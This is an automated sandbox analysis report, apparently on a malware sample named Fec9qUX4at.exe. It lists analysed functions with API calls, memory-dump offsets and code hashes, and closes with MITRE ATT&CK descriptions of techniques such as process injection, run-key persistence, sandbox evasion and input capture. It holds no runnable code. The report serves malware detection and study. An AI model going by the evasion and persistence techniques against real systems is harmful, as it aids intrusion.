Function 04F524CD, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6a9e97b5305b9a819230a2c8e5ab87776ca050d087cb7104dad0f343b33cb282
Instruction ID: 45d690b50f8a5b896dbad4336fc6c4b17f71e5c60c985499450157de9b30983e
Opcode Fuzzy Hash: 6a9e97b5305b9a819230a2c8e5ab87776ca050d087cb7104dad0f343b33cb282
Instruction Fuzzy Hash: 07312271504345AFDF30AF68DD886CA77F5BF4D310F02422AED4CCB625E6709A428A56

Uniqueness

Uniqueness Score: -1.00%

Function 04F54212, Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9d431e57c44891ad1a1670b501b43f574e20c78a206473406d321a1a2c875b3e
Instruction ID: a19ae22ac82cdcbd45444fd65fe4702a02ab4ef55e0123000c347dc32a12dbb1
Opcode Fuzzy Hash: 9d431e57c44891ad1a1670b501b43f574e20c78a206473406d321a1a2c875b3e
Instruction Fuzzy Hash: 0321F872504345AFEF30BF689D887D977F9AF4C750F410226DE0CCB624D7745A028A55

Uniqueness

Uniqueness Score: -1.00%

Function 04F573C9, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72e3e64874a852afc2b06635e97ff157f3876d2b42c023273030caf5cd508e0e
Instruction ID: faf547e4c76e850590aa5b69d0e673a4ddd629cdc5af83f59db0e94afb9949d6
Opcode Fuzzy Hash: 72e3e64874a852afc2b06635e97ff157f3876d2b42c023273030caf5cd508e0e
Instruction Fuzzy Hash: 3C21AF71904249AFEF30AF69AC487D977F9AF4C310F05021AED0C8B624D770AA028A56

Uniqueness

Uniqueness Score: -1.00%

Function 04F57052, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?), ref: 04F5717F

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 0732bd8ccf7dda552d74168a6de79702e2a0b7234f95d6ed3ccad17bff0d2619
Instruction ID: 710cd8482fc9c6ca12dfbd71125eb0c4f2fbd412d83ac30897db10b70320e360
Opcode Fuzzy Hash: 0732bd8ccf7dda552d74168a6de79702e2a0b7234f95d6ed3ccad17bff0d2619
Instruction Fuzzy Hash: 4CE039329082949FCB74EE14C8906EAB2B5EF64390F46440EED889B110D3706D808B52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04F5864F, Relevance: 3.0, Strings: 2, Instructions: 461COMMON

Download Yara Rule

Strings

_o7, xrefs: 04F506BB
?fB., xrefs: 04F58ADC

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ?fB.$_o7
API String ID: 3389902171-2351114068
Opcode ID: a5df2b347951536e05a25ec4aaab7e4f38929d3322e5cce2483a73ca57a87aa8
Instruction ID: c6e32ad9567cbb360ea69cc0bd6b3056370038901ebdd86372006f817c26dd26
Opcode Fuzzy Hash: a5df2b347951536e05a25ec4aaab7e4f38929d3322e5cce2483a73ca57a87aa8
Instruction Fuzzy Hash: 7C12E8715083C58FCB31DF38C8987DABBE2AF56354F49829ACC998F2A6D3309546C712

Uniqueness

Uniqueness Score: -1.00%

Function 04F58759, Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

w, xrefs: 04F5883F
?fB., xrefs: 04F58ADC

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ?fB.$w
API String ID: 0-1859872851
Opcode ID: 726592695901f5796090d0f34354503750224bb66bf6410bdd1f5ea4ea33e029
Instruction ID: 11f7f78e4faaf001d9c8c101f5c69beacc26de8cceaf14bdf039821f3cfd584d
Opcode Fuzzy Hash: 726592695901f5796090d0f34354503750224bb66bf6410bdd1f5ea4ea33e029
Instruction Fuzzy Hash: B7C1E2315087C68EDB318F7889A9386BF929F03374F0D8299CEEA4E1E3D3619615C746

Uniqueness

Uniqueness Score: -1.00%

Function 04F53051, Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

rp}, xrefs: 04F53270
6=lL, xrefs: 04F533F2

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6=lL$rp}
API String ID: 0-2610716473
Opcode ID: 4bc7956444a598efd7208cb7a6e0336db8f9e4772c6ec9f9879b26fb4d802c97
Instruction ID: 3bf26ad8529959bf1ac3ca06f1dfe30a5444664304810d00f9e382bd50d661c3
Opcode Fuzzy Hash: 4bc7956444a598efd7208cb7a6e0336db8f9e4772c6ec9f9879b26fb4d802c97
Instruction Fuzzy Hash: CCB1D37260879A9FDB30CF78CD957C9BBA1BF06364F080209DEA957291D770AA15CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04F5380C, Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

>m9, xrefs: 04F59BE1
'#w, xrefs: 04F53B1C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: '#w$>m9
API String ID: 0-4164438735
Opcode ID: 4ddcc08cc40e2931e260e0a9dd0a3a2f950864459ab3d8013d41cf1425f1ad27
Instruction ID: 8f2a5d16b8eea1e8eeda71e6246063ad6e2216601b29368a89730e976dac30b8
Opcode Fuzzy Hash: 4ddcc08cc40e2931e260e0a9dd0a3a2f950864459ab3d8013d41cf1425f1ad27
Instruction Fuzzy Hash: 9C7116B2504345DFE7289F38CC18BEAB7A2FF55350F56814DDD8A8B264D3709A82CB06

Uniqueness

Uniqueness Score: -1.00%

Function 04F57AA5, Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

`, xrefs: 04F57B8B
="%*, xrefs: 04F57B57

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ="%*$`
API String ID: 0-3267555959
Opcode ID: 834cc398d6c5ae8e992a8e14aaec6f7820581b96bb0233af7666cdfe713cfea7
Instruction ID: ce5695e923d2b762773546de0252c0166253d608b3067a20e1fbf2f1f642a4ba
Opcode Fuzzy Hash: 834cc398d6c5ae8e992a8e14aaec6f7820581b96bb0233af7666cdfe713cfea7
Instruction Fuzzy Hash: 3121DD72A116954BEF789E25CD553DE33B39FD5380F62801ACC4EDB228D7305A434B59

Uniqueness

Uniqueness Score: -1.00%

Function 04F585F7, Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

?fB., xrefs: 04F58ADC

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: ?fB.
API String ID: 3389902171-3687817265
Opcode ID: 58f51944fc7b409344dab3f245f22e6dcd146f50f8a516537ccf3c1c8e727b8b
Instruction ID: 0bfde3199e09da7d3eb054265dbeb1e57339e6148d087eb1f8d9c0699b77fa4c
Opcode Fuzzy Hash: 58f51944fc7b409344dab3f245f22e6dcd146f50f8a516537ccf3c1c8e727b8b
Instruction Fuzzy Hash: 7BD1C7715083C58ECB25DF38C89879ABFE19F16260F4982DECC998F2A7D3359545C712

Uniqueness

Uniqueness Score: -1.00%

Function 04F514D9, Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

*U, xrefs: 04F51629

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: *U
API String ID: 0-3468590382
Opcode ID: b4fbc16de0f831499d4116c987fc69d5908e2de20a7a3cd024fdec6e2cd7696e
Instruction ID: 4b57bf7796d9438d06c516e1513d2e08ff660eb80af26e52f860c72b99de808a
Opcode Fuzzy Hash: b4fbc16de0f831499d4116c987fc69d5908e2de20a7a3cd024fdec6e2cd7696e
Instruction Fuzzy Hash: 85B1487250838A8FE7209F78CD553D9BBE1EF06324F49025CDEE99B6A1D770A641CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F514D1, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

*U, xrefs: 04F51629

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: *U
API String ID: 0-3468590382
Opcode ID: 2aeb5e97a691f41a6e6806d5dbcfe05e56aeadc2cecdfcde5ace7a7b61d41e91
Instruction ID: 0e03ee5966ce720fbf2975d9459360764946bf3d146104313da9a43668a8a4e9
Opcode Fuzzy Hash: 2aeb5e97a691f41a6e6806d5dbcfe05e56aeadc2cecdfcde5ace7a7b61d41e91
Instruction Fuzzy Hash: E28123729043858FEB349F38CD487EA7BE1AF55300F46416DDD89AB665C230AA82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F57EAD, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

GUb, xrefs: 04F57F10

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: GUb
API String ID: 1029625771-989475670
Opcode ID: b8ecaba17da8340310d6e50dc3054f5e8c76b745ac63d88b8cc61f169632f950
Instruction ID: d779c39da3b3c031e4a8b27f15fd2dfdefa971bac43bb5eab2dfc838efb06cfb
Opcode Fuzzy Hash: b8ecaba17da8340310d6e50dc3054f5e8c76b745ac63d88b8cc61f169632f950
Instruction Fuzzy Hash: 6E81D4B1A00789DFDB30DE68DC947DA77E2FF88380F55412ACE489B214D730AA92CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04F57F61, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

GUb, xrefs: 04F57F10

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: GUb
API String ID: 0-989475670
Opcode ID: fc3c2ddf8d6c82a92161de380aab238d5a7d4e2b0d348c2ed403b268705363a4
Instruction ID: 3050cb86c37eb67a3c243ae54e4a67588e41a962bba9f7fc8721caa83e15e736
Opcode Fuzzy Hash: fc3c2ddf8d6c82a92161de380aab238d5a7d4e2b0d348c2ed403b268705363a4
Instruction Fuzzy Hash: 8A61E7711487CB9FD730CE74DD953CABB92AF06375F485208CFA9161A1E770A621CA85

Uniqueness

Uniqueness Score: -1.00%

Function 04F58181, Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

GUb, xrefs: 04F57F10

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: GUb
API String ID: 0-989475670
Opcode ID: 24765e6aad7657eec4956f60afa3188519d8e97a7f598069c15f7e080bfaf621
Instruction ID: 706049f8eb717f5a441d6820fb8d6fc0da6294e6a5058ba8492abab5ef86ff16
Opcode Fuzzy Hash: 24765e6aad7657eec4956f60afa3188519d8e97a7f598069c15f7e080bfaf621
Instruction Fuzzy Hash: 12514471545789EFCB30CF28DD956DA7BA2FF49340F04822ACD488B615D330A693CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04F51D86, Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

_o7, xrefs: 04F506BB

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: _o7
API String ID: 0-375896732
Opcode ID: ba2570158708d404784f04b567c15cbc9f21d10bf27141b65c5159544b38b82f
Instruction ID: 49b4fd1396b406e55810ecf60841b992c4f16b733c3b3881db928b11af36b5af
Opcode Fuzzy Hash: ba2570158708d404784f04b567c15cbc9f21d10bf27141b65c5159544b38b82f
Instruction Fuzzy Hash: 6051E6B2A042489FDB789F69CC50BEE7BE6AF88310F15802EED4D9B210D6305A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04F53996, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

'#w, xrefs: 04F53B1C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: '#w
API String ID: 0-2949755655
Opcode ID: af07e406827e974c2350763d01c24110c5ce44f973993d7f11c16524ed0b6723
Instruction ID: 8038b1a62aa33ad024149134ecf367306815275fbfee5e0a5503eb2fa8893dce
Opcode Fuzzy Hash: af07e406827e974c2350763d01c24110c5ce44f973993d7f11c16524ed0b6723
Instruction Fuzzy Hash: E751D2721187CB9EE3208BB48D5578AFF929F07375F585208DFFA061E1E7B0A6118641

Uniqueness

Uniqueness Score: -1.00%

Function 04F538B9, Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

'#w, xrefs: 04F53B1C

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID: '#w
API String ID: 0-2949755655
Opcode ID: 7baa2f222025e90aa161ab4da98ebc16a03b25a42f48fe0d6a7c08edce3c5b34
Instruction ID: 37a7e894b127c2064f7e43acd8303ca847deb0505836a626e4a2d745cc2e1e8c
Opcode Fuzzy Hash: 7baa2f222025e90aa161ab4da98ebc16a03b25a42f48fe0d6a7c08edce3c5b34
Instruction Fuzzy Hash: 164123B1504345DFEB28AF39CC19BFA7BA2EF95350F56841DDD8A8B264D3305982CB06

Uniqueness

Uniqueness Score: -1.00%

Function 04F51D8F, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c911b52b3882cc769f0e12ee9d9586674feba2f6aea517dda753902431c70dd
Instruction ID: ace146e8d7b58b6179e8eaee0e017cbe7c2bac7cddb0f3cdcce76e2ffd7ef3b0
Opcode Fuzzy Hash: 7c911b52b3882cc769f0e12ee9d9586674feba2f6aea517dda753902431c70dd
Instruction Fuzzy Hash: 7F81D47250878A9FD7248F78CD513DABBD29F4A334F18021CDFAE572A1D7746A50CA81

Uniqueness

Uniqueness Score: -1.00%

Function 04F5293E, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca7359e7ce9dc4c3a93d8f3d8059f4319d337b52a234ecaed9e05af4a41956b
Instruction ID: 89fd7164c04a7e2b87a34227efa7b5235b2b39540ea0dc840c265c1383ac0dde
Opcode Fuzzy Hash: 8ca7359e7ce9dc4c3a93d8f3d8059f4319d337b52a234ecaed9e05af4a41956b
Instruction Fuzzy Hash: C571BEB25043599FCB749E398C84BEAB7F6BF94750F45851EDD899B210D730AA828B02

Uniqueness

Uniqueness Score: -1.00%

Function 04F52AAE, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5979cb105c4fe8f24f66410db6856cb9353353e33931b8f4787a914d89eb96
Instruction ID: aeb243f17089daa9b45140e43cca47e178455654b0ab0bba21f0e461944f26fa
Opcode Fuzzy Hash: 8d5979cb105c4fe8f24f66410db6856cb9353353e33931b8f4787a914d89eb96
Instruction Fuzzy Hash: 835110B15483998FCB749F388C84BEA77B6FF84700F85451DDC889B620D735AA82CB16

Uniqueness

Uniqueness Score: -1.00%

Function 04F58C9D, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4307a20d0c4a1f22eda441bea184d014c05cfa1d963e2338faf627882cb4a5d6
Instruction ID: 32137290b27aec185aec34912c1ef1bbdc9c98d48c7a6c66005e07b94c02f78e
Opcode Fuzzy Hash: 4307a20d0c4a1f22eda441bea184d014c05cfa1d963e2338faf627882cb4a5d6
Instruction Fuzzy Hash: C0410575908289CBDF31DF25CD983DA7BA2AF52350F848266CC889F269D3345643CB15

Uniqueness

Uniqueness Score: -1.00%

Function 04F577CC, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae55861ed83ff780c3e8721f5a3a321434046f3bcfbad23fdafcb2c4a96dfd89
Instruction ID: 491b0fc4585b3b16641b44e82eb09d81eefc50b6e9ca740bc7573e920e744fcd
Opcode Fuzzy Hash: ae55861ed83ff780c3e8721f5a3a321434046f3bcfbad23fdafcb2c4a96dfd89
Instruction Fuzzy Hash: B9112BB6B057068BDB20BE38C9D07E7A2D7EFB9710F81412A9D058B629F3746846C711

Uniqueness

Uniqueness Score: -1.00%

Function 04F54292, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5d63a74f8617338ded6aac58d30e79afdf39656a735ec1c600f4a0dd0d71f4
Instruction ID: 0ead28ce1667d3706c7fd0a58c462bf5bb21ddf1bc05eace2e917f7cf82545da
Opcode Fuzzy Hash: 7c5d63a74f8617338ded6aac58d30e79afdf39656a735ec1c600f4a0dd0d71f4
Instruction Fuzzy Hash: 981176742443848FEB64EFB48C947EBB7E2FF89740F92462CCC8A83324C3300A468A04

Uniqueness

Uniqueness Score: -1.00%

Function 04F579C6, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f848d05097df93def732d4b0d1120199fdc590b61596e894b5d48f9113a21b55
Instruction ID: 37865a41d97f04b483469ca5250b8363cada022269ff23d488546e79c54c6d63
Opcode Fuzzy Hash: f848d05097df93def732d4b0d1120199fdc590b61596e894b5d48f9113a21b55
Instruction Fuzzy Hash: D101D6B5719294DFDB34DF18C8D0EDA73A2BF09710F49546AEE199B321D630AA00DB21

Uniqueness

Uniqueness Score: -1.00%

Function 04F5546D, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd7b0a3219b1127c02cda12faac333263f07eb838cde2bc2ff272d1dd6c1307
Instruction ID: fee9d989c7b3d39a336799225af6743fac457f3456748666a4b9a34bcf7acf9a
Opcode Fuzzy Hash: dfd7b0a3219b1127c02cda12faac333263f07eb838cde2bc2ff272d1dd6c1307
Instruction Fuzzy Hash: 82B092F73025808FEB05CB08C491B0473A0FB00648F0404A0E002CBB12D324ED00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 04F573B7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Fec9qUX4at.exe PID: 1152 Parent PID: 1304 Fec9qUX4at.exeCOMMON

Executed Functions

Function 00569A02, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00569A62

Memory Dump Source

Source File: 00000011.00000002.487357294.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f1798fb01d0978b4c4060df75017ef6ab9c006a75c590d9fd2e661de762bcb52
Instruction ID: 7df7da88e165f7df2e381d4e1385d450b59e82fc174fa58a7a314851577e9ebd
Opcode Fuzzy Hash: f1798fb01d0978b4c4060df75017ef6ab9c006a75c590d9fd2e661de762bcb52
Instruction Fuzzy Hash: 6DE03930508381CECB286F30D9966AA7BB1BF55305F02482EC9D596062E37008918B17

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
